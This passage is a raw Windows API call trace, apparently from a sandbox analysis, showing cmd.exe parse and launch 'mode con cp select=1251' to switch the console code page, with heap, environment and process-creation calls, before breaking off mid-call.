lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.297] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.297] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee34a, cchWideChar=1 | out: lpWideCharStr="5") returned 1 [0032.297] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.297] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.297] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.297] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee34c, cchWideChar=1 | out: lpWideCharStr="1") returned 1 [0032.297] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.297] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.297] ReadFile (in: hFile=0xe8, lpBuffer=0x4a8ec320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19f9a8, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesRead=0x19f9a8*=0x1, lpOverlapped=0x0) returned 1 [0032.297] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a8ec320, cbMultiByte=1, lpWideCharStr=0x4a8ee34e, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0032.298] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.298] GetFileType (hFile=0xe8) returned 0x3 [0032.298] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.298] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0032.298] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.298] GetFileType (hFile=0xf4) returned 0x3 [0032.298] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.298] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="mode con cp select=1251\n", cchWideChar=-1, lpMultiByteStr=0x4a8ec320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mode con cp select=1251\n", lpUsedDefaultChar=0x0) returned 25 [0032.298] WriteFile (in: hFile=0xf4, lpBuffer=0x4a8ec320*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x19f988, lpOverlapped=0x0 | out: lpBuffer=0x4a8ec320*, lpNumberOfBytesWritten=0x19f988*=0x18, lpOverlapped=0x0) returned 1 [0032.298] GetProcessHeap () returned 0x220000 [0032.298] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x4012) returned 0x23cd20 [0032.298] GetProcessHeap () returned 0x220000 [0032.298] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x23cd20 | out: hHeap=0x220000) returned 1 [0032.298] _wcsicmp (_String1="mode", _String2=")") returned 68 [0032.299] _wcsicmp (_String1="FOR", _String2="mode") returned -7 [0032.299] _wcsicmp (_String1="FOR/?", _String2="mode") returned -7 [0032.299] _wcsicmp (_String1="IF", _String2="mode") returned -4 [0032.299] _wcsicmp (_String1="IF/?", _String2="mode") returned -4 [0032.299] _wcsicmp (_String1="REM", _String2="mode") returned 5 [0032.299] _wcsicmp (_String1="REM/?", _String2="mode") returned 5 [0032.299] GetProcessHeap () returned 0x220000 [0032.299] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xb0) returned 0x2397e0 [0032.299] GetProcessHeap () returned 0x220000 [0032.299] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x1a) returned 0x234610 [0032.299] GetProcessHeap () returned 0x220000 [0032.299] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x38) returned 0x236510 [0032.300] GetConsoleOutputCP () returned 0x1b5 [0032.306] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a8ebfe0 | out: lpCPInfo=0x4a8ebfe0) returned 1 [0032.306] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0032.306] GetConsoleTitleW (in: lpConsoleTitle=0x19f940, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0032.306] _wcsicmp (_String1="mode", _String2="DIR") returned 9 [0032.306] _wcsicmp (_String1="mode", _String2="ERASE") returned 8 [0032.306] _wcsicmp (_String1="mode", _String2="DEL") returned 9 [0032.306] _wcsicmp (_String1="mode", _String2="TYPE") returned -7 [0032.306] _wcsicmp (_String1="mode", _String2="COPY") returned 10 [0032.306] _wcsicmp (_String1="mode", _String2="CD") returned 10 [0032.306] _wcsicmp (_String1="mode", _String2="CHDIR") returned 10 [0032.307] _wcsicmp (_String1="mode", _String2="RENAME") returned -5 [0032.307] _wcsicmp (_String1="mode", _String2="REN") returned -5 [0032.307] _wcsicmp (_String1="mode", _String2="ECHO") returned 8 [0032.307] _wcsicmp (_String1="mode", _String2="SET") returned -6 [0032.307] _wcsicmp (_String1="mode", _String2="PAUSE") returned -3 [0032.307] _wcsicmp (_String1="mode", _String2="DATE") returned 9 [0032.307] _wcsicmp (_String1="mode", _String2="TIME") returned -7 [0032.307] _wcsicmp (_String1="mode", _String2="PROMPT") returned -3 [0032.307] _wcsicmp (_String1="mode", _String2="MD") returned 11 [0032.307] _wcsicmp (_String1="mode", _String2="MKDIR") returned 4 [0032.307] _wcsicmp (_String1="mode", _String2="RD") returned -5 [0032.307] _wcsicmp (_String1="mode", _String2="RMDIR") returned -5 [0032.307] _wcsicmp (_String1="mode", _String2="PATH") returned -3 [0032.307] _wcsicmp (_String1="mode", _String2="GOTO") returned 6 [0032.307] _wcsicmp (_String1="mode", _String2="SHIFT") returned -6 [0032.307] _wcsicmp (_String1="mode", _String2="CLS") returned 10 [0032.307] _wcsicmp (_String1="mode", _String2="CALL") returned 10 [0032.307] _wcsicmp (_String1="mode", _String2="VERIFY") returned -9 [0032.307] _wcsicmp (_String1="mode", _String2="VER") returned -9 [0032.307] _wcsicmp (_String1="mode", _String2="VOL") returned -9 [0032.307] _wcsicmp (_String1="mode", _String2="EXIT") returned 8 [0032.307] _wcsicmp (_String1="mode", _String2="SETLOCAL") returned -6 [0032.307] _wcsicmp (_String1="mode", _String2="ENDLOCAL") returned 8 [0032.307] _wcsicmp (_String1="mode", _String2="TITLE") returned -7 [0032.307] _wcsicmp (_String1="mode", _String2="START") returned -6 [0032.307] _wcsicmp (_String1="mode", _String2="DPATH") returned 9 [0032.307] _wcsicmp (_String1="mode", _String2="KEYS") returned 2 [0032.307] _wcsicmp (_String1="mode", _String2="MOVE") returned -18 [0032.307] _wcsicmp (_String1="mode", _String2="PUSHD") returned -3 [0032.307] _wcsicmp (_String1="mode", _String2="POPD") returned -3 [0032.307] _wcsicmp (_String1="mode", _String2="ASSOC") returned 12 [0032.307] _wcsicmp (_String1="mode", _String2="FTYPE") returned 7 [0032.307] _wcsicmp (_String1="mode", _String2="BREAK") returned 11 [0032.307] _wcsicmp (_String1="mode", _String2="COLOR") returned 10 [0032.307] _wcsicmp (_String1="mode", _String2="MKLINK") returned 4 [0032.307] _wcsicmp (_String1="mode", _String2="DIR") returned 9 [0032.307] _wcsicmp (_String1="mode", _String2="ERASE") returned 8 [0032.307] _wcsicmp (_String1="mode", _String2="DEL") returned 9 [0032.307] _wcsicmp (_String1="mode", _String2="TYPE") returned -7 [0032.308] _wcsicmp (_String1="mode", _String2="COPY") returned 10 [0032.308] _wcsicmp (_String1="mode", _String2="CD") returned 10 [0032.308] _wcsicmp (_String1="mode", _String2="CHDIR") returned 10 [0032.308] _wcsicmp (_String1="mode", _String2="RENAME") returned -5 [0032.308] _wcsicmp (_String1="mode", _String2="REN") returned -5 [0032.308] _wcsicmp (_String1="mode", _String2="ECHO") returned 8 [0032.308] _wcsicmp (_String1="mode", _String2="SET") returned -6 [0032.308] _wcsicmp (_String1="mode", _String2="PAUSE") returned -3 [0032.308] _wcsicmp (_String1="mode", _String2="DATE") returned 9 [0032.308] _wcsicmp (_String1="mode", _String2="TIME") returned -7 [0032.308] _wcsicmp (_String1="mode", _String2="PROMPT") returned -3 [0032.308] _wcsicmp (_String1="mode", _String2="MD") returned 11 [0032.308] _wcsicmp (_String1="mode", _String2="MKDIR") returned 4 [0032.308] _wcsicmp (_String1="mode", _String2="RD") returned -5 [0032.308] _wcsicmp (_String1="mode", _String2="RMDIR") returned -5 [0032.308] _wcsicmp (_String1="mode", _String2="PATH") returned -3 [0032.308] _wcsicmp (_String1="mode", _String2="GOTO") returned 6 [0032.308] _wcsicmp (_String1="mode", _String2="SHIFT") returned -6 [0032.308] _wcsicmp (_String1="mode", _String2="CLS") returned 10 [0032.308] _wcsicmp (_String1="mode", _String2="CALL") returned 10 [0032.308] _wcsicmp (_String1="mode", _String2="VERIFY") returned -9 [0032.308] _wcsicmp (_String1="mode", _String2="VER") returned -9 [0032.308] _wcsicmp (_String1="mode", _String2="VOL") returned -9 [0032.308] _wcsicmp (_String1="mode", _String2="EXIT") returned 8 [0032.308] _wcsicmp (_String1="mode", _String2="SETLOCAL") returned -6 [0032.308] _wcsicmp (_String1="mode", _String2="ENDLOCAL") returned 8 [0032.308] _wcsicmp (_String1="mode", _String2="TITLE") returned -7 [0032.308] _wcsicmp (_String1="mode", _String2="START") returned -6 [0032.308] _wcsicmp (_String1="mode", _String2="DPATH") returned 9 [0032.308] _wcsicmp (_String1="mode", _String2="KEYS") returned 2 [0032.308] _wcsicmp (_String1="mode", _String2="MOVE") returned -18 [0032.308] _wcsicmp (_String1="mode", _String2="PUSHD") returned -3 [0032.308] _wcsicmp (_String1="mode", _String2="POPD") returned -3 [0032.308] _wcsicmp (_String1="mode", _String2="ASSOC") returned 12 [0032.308] _wcsicmp (_String1="mode", _String2="FTYPE") returned 7 [0032.308] _wcsicmp (_String1="mode", _String2="BREAK") returned 11 [0032.308] _wcsicmp (_String1="mode", _String2="COLOR") returned 10 [0032.308] _wcsicmp (_String1="mode", _String2="MKLINK") returned 4 [0032.308] _wcsicmp (_String1="mode", _String2="FOR") returned 7 [0032.308] _wcsicmp (_String1="mode", _String2="IF") returned 4 [0032.308] _wcsicmp (_String1="mode", _String2="REM") returned -5 [0032.309] GetProcessHeap () returned 0x220000 [0032.309] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x218) returned 0x221ab0 [0032.309] GetProcessHeap () returned 0x220000 [0032.309] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x42) returned 0x2398a0 [0032.309] _wcsnicmp (_String1="mode", _String2="cmd ", _MaxCount=0x4) returned 10 [0032.309] GetProcessHeap () returned 0x220000 [0032.309] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x420) returned 0x239a80 [0032.309] SetErrorMode (uMode=0x0) returned 0x0 [0032.309] SetErrorMode (uMode=0x1) returned 0x0 [0032.309] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x239a90, lpFilePart=0x19f1d0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x19f1d0*="Desktop") returned 0x25 [0032.309] SetErrorMode (uMode=0x0) returned 0x1 [0032.309] GetProcessHeap () returned 0x220000 [0032.309] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x239a80, Size=0x66) returned 0x239a80 [0032.309] GetProcessHeap () returned 0x220000 [0032.309] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x239a80) returned 0x66 [0032.309] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a8df360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0032.309] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0032.310] GetProcessHeap () returned 0x220000 [0032.310] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x128) returned 0x221cd0 [0032.310] GetProcessHeap () returned 0x220000 [0032.310] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x240) returned 0x239b00 [0032.315] GetProcessHeap () returned 0x220000 [0032.315] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x239b00, Size=0x12a) returned 0x239b00 [0032.315] GetProcessHeap () returned 0x220000 [0032.315] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x239b00) returned 0x12a [0032.315] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a8df360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0032.315] GetProcessHeap () returned 0x220000 [0032.315] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xe8) returned 0x235b70 [0032.315] GetProcessHeap () returned 0x220000 [0032.315] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x235b70, Size=0x7e) returned 0x235b70 [0032.315] GetProcessHeap () returned 0x220000 [0032.315] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x235b70) returned 0x7e [0032.316] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0032.316] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mode.*", fInfoLevelId=0x1, lpFindFileData=0x19ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19ef40) returned 0xffffffffffffffff [0032.317] GetLastError () returned 0x2 [0032.317] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mode", fInfoLevelId=0x1, lpFindFileData=0x19ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19ef40) returned 0xffffffffffffffff [0032.317] GetLastError () returned 0x2 [0032.317] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0032.317] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\mode.*", fInfoLevelId=0x1, lpFindFileData=0x19ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19ef40) returned 0x235c00 [0032.317] GetProcessHeap () returned 0x220000 [0032.317] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x0, Size=0x28) returned 0x234640 [0032.317] FindClose (in: hFindFile=0x235c00 | out: hFindFile=0x235c00) returned 1 [0032.317] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\mode.COM", fInfoLevelId=0x1, lpFindFileData=0x19ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19ef40) returned 0x235c00 [0032.317] GetProcessHeap () returned 0x220000 [0032.317] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x234640, Size=0x8) returned 0x2398f0 [0032.317] FindClose (in: hFindFile=0x235c00 | out: hFindFile=0x235c00) returned 1 [0032.317] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1 [0032.317] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2 [0032.317] GetConsoleTitleW (in: lpConsoleTitle=0x19f490, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0032.318] GetProcessHeap () returned 0x220000 [0032.318] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x21c) returned 0x239c40 [0032.318] GetConsoleTitleW (in: lpConsoleTitle=0x239c50, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0032.318] GetProcessHeap () returned 0x220000 [0032.318] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x239c40, Size=0xa8) returned 0x239c40 [0032.318] GetProcessHeap () returned 0x220000 [0032.318] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x239c40) returned 0xa8 [0032.318] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe - mode con cp select=1251") returned 1 [0032.318] GetProcessHeap () returned 0x220000 [0032.318] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x239c40 | out: hHeap=0x220000) returned 1 [0032.318] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f248, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f208 | out: lpAttributeList=0x19f248, lpSize=0x19f208) returned 1 [0032.318] UpdateProcThreadAttribute (in: lpAttributeList=0x19f248, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f1f8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f248, lpPreviousValue=0x0) returned 1 [0032.319] GetStartupInfoW (in: lpStartupInfo=0x19f360 | out: lpStartupInfo=0x19f360*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xe8, hStdOutput=0xf4, hStdError=0xf4)) [0032.319] GetProcessHeap () returned 0x220000 [0032.319] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x20) returned 0x234640 [0032.319] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0032.319] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0032.319] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0032.319] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0032.319] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0032.319] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0032.319] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0032.319] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0032.319] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0032.319] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0032.319] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0032.319] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0032.319] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0032.319] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0032.319] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0032.319] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0032.319] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0032.319] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0032.319] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0032.319] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0032.319] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0032.319] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0032.319] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0032.319] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0032.319] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0032.319] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0032.319] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0032.319] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0032.319] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0032.319] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0032.319] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0032.319] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0032.319] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0032.320] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0032.320] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0032.320] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0032.320] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0032.320] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0032.320] GetProcessHeap () returned 0x220000 [0032.320] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x234640 | out: hHeap=0x220000) returned 1 [0032.320] GetProcessHeap () returned 0x220000 [0032.320] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x12) returned 0x238900 [0032.320] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\mode.com", lpCommandLine="mode con cp select=1251", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x19f280*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="mode con cp select=1251", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f230 | out: lpCommandLine="mode con cp select=1251", lpProcessInformation=0x19f230*(hProcess=0x54, hThread=0x50, dwProcessId=0xac0, dwThreadId=0xac4)) returned 1 [0032.328] CloseHandle (hObject=0x50) returned 1 [0032.328] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0032.328] GetProcessHeap () returned 0x220000 [0032.328] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x23c230 | out: hHeap=0x220000) returned 1 [0032.328] GetEnvironmentStringsW () returned 0x23aa10* [0032.328] GetProcessHeap () returned 0x220000 [0032.328] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xae8) returned 0x23b500 [0032.328] FreeEnvironmentStringsW (penv=0x23aa10) returned 1 [0032.328] LoadLibraryW (lpLibFileName="NTDLL.DLL") returned 0x76f50000 [0032.328] GetProcAddress (hModule=0x76f50000, lpProcName="NtQueryInformationProcess") returned 0x76fa14a0 [0032.328] NtQueryInformationProcess (in: ProcessHandle=0x54, ProcessInformationClass=0x0, ProcessInformation=0x19eb38, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x19eb38, ReturnLength=0x0) returned 0x0 [0032.328] ReadProcessMemory (in: hProcess=0x54, lpBaseAddress=0x7fffffdf000, lpBuffer=0x19eb70, nSize=0x380, lpNumberOfBytesRead=0x19eb30 | out: lpBuffer=0x19eb70*, lpNumberOfBytesRead=0x19eb30*=0x380) returned 1 [0032.329] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0032.734] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x19f178 | out: lpExitCode=0x19f178*=0x0) returned 1 [0032.734] CloseHandle (hObject=0x54) returned 1 [0032.734] _vsnwprintf (in: _Buffer=0x19f3e8, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f188 | out: _Buffer="00000000") returned 8 [0032.734] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0032.734] GetProcessHeap () returned 0x220000 [0032.734] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x23b500 | out: hHeap=0x220000) returned 1 [0032.734] GetEnvironmentStringsW () returned 0x23aa10* [0032.734] GetProcessHeap () returned 0x220000 [0032.734] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xb0e) returned 0x23eb10 [0032.734] FreeEnvironmentStringsW (penv=0x23aa10) returned 1 [0032.735] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0032.735] GetProcessHeap () returned 0x220000 [0032.735] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x23eb10 | out: hHeap=0x220000) returned 1 [0032.735] GetEnvironmentStringsW () returned 0x23aa10* [0032.735] GetProcessHeap () returned 0x220000 [0032.735] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xb0e) returned 0x23eb10 [0032.735] FreeEnvironmentStringsW (penv=0x23aa10) returned 1 [0032.735] GetProcessHeap () returned 0x220000 [0032.735] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x238900 | out: hHeap=0x220000) returned 1 [0032.735] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f248 | out: lpAttributeList=0x19f248) [0032.744] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 1 [0032.745] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.745] SetConsoleMode (hConsoleHandle=0xf4, dwMode=0x0) returned 0 [0032.745] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.745] GetConsoleMode (in: hConsoleHandle=0xf4, lpMode=0x4a8de194 | out: lpMode=0x4a8de194) returned 0 [0032.745] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.745] GetConsoleMode (in: hConsoleHandle=0xe8, lpMode=0x4a8de198 | out: lpMode=0x4a8de198) returned 0 [0032.745] GetConsoleOutputCP () returned 0x4e3 [0032.746] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x4a8ebfe0 | out: lpCPInfo=0x4a8ebfe0) returned 1 [0032.746] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0032.746] GetProcessHeap () returned 0x220000 [0032.746] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x235b70 | out: hHeap=0x220000) returned 1 [0032.746] GetProcessHeap () returned 0x220000 [0032.746] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x239b00 | out: hHeap=0x220000) returned 1 [0032.746] GetProcessHeap () returned 0x220000 [0032.746] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x221cd0 | out: hHeap=0x220000) returned 1 [0032.746] GetProcessHeap () returned 0x220000 [0032.746] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x239a80 | out: hHeap=0x220000) returned 1 [0032.746] GetProcessHeap () returned 0x220000 [0032.746] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x2398a0 | out: hHeap=0x220000) returned 1 [0032.746] GetProcessHeap () returned 0x220000 [0032.746] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x221ab0 | out: hHeap=0x220000) returned 1 [0032.746] GetProcessHeap () returned 0x220000 [0032.746] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x236510 | out: hHeap=0x220000) returned 1 [0032.746] GetProcessHeap () returned 0x220000 [0032.746] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x234610 | out: hHeap=0x220000) returned 1 [0032.746] GetProcessHeap () returned 0x220000 [0032.746] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x2397e0 | out: hHeap=0x220000) returned 1 [0032.746] _vsnwprintf (in: _Buffer=0x4a8f6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x19f6a8 | out: _Buffer="\r\n") returned 2 [0032.746] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.746] GetFileType (hFile=0xf4) returned 0x3 [0032.747] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.747] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a8ec320, 